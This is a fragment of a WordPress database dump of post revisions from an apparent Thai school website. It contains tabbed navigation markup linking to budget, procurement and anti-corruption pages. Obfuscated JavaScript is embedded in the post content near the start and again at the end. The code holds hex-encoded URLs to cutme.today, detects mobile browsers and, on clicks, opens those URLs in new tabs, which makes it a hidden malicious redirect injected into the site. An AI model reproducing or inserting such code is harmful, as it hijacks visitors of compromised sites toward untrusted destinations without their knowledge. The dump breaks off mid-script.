_0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่','','inherit','closed','closed','','784-revision-v1','','','2025-07-05 14:52:22','2025-07-05 07:52:22','',784,'http://pakhaeng.ssk.in.th/?p=1714',0,'revision','',0),
(1715,1,'2025-07-05 14:59:06','2025-07-05 07:59:06','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 